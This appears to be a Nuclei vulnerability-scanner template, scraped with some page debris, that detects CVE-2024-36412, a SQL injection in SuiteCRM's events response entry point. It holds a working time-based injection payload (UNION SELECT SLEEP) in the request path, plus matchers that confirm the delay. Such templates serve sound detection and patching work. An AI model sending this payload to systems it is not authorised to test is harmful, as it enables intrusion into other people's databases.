33 lines
1.1 KiB
YAML
33 lines
1.1 KiB
YAML
|
id: CVE-2024-36412
|
||
|
|
|
||
|
|
info:
|
||
|
|
name: SuiteCRM SQL Injection
|
||
|
|
author: securityforeveryone.com
|
||
|
|
severity: critical
|
||
|
|
description: |
|
||
|
|
SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
|
||
|
|
remediation: 7.14.4 and 8.6.1
|
||
|
|
reference:
|
||
|
|
- https://0x5001.com/web-security/cve-2024-36412-proof-of-concept
|
||
|
|
- https://www.tenable.com/cve/CVE-2024-36412
|
||
|
|
tags: SuiteCRM,cve,cve2024
|
||
|
|
|
||
|
|
http:
|
||
|
|
- method: GET
|
||
|
|
path:
|
||
|
|
- '{{BaseURL}}/index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(4);--+-&type=c&response=accept'
|
||
|
|
|
||
|
|
matchers-condition: and
|
||
|
|
matchers:
|
||
|
|
- type: word
|
||
|
|
words:
|
||
|
|
- "You have already responded to the invitation or there was a problem with the link. Please contact the sender of the invite for help"
|
||
|
|
- "Thank you for accepting"
|
||
|
|
condition: or
|
||
|
|
|
||
|
|
- type: dsl
|
||
|
|
dsl:
|
||
|
|
- 'duration>=4'
|
||
|
|
- 'status_code == 200'
|
||
|
|
condition: and
|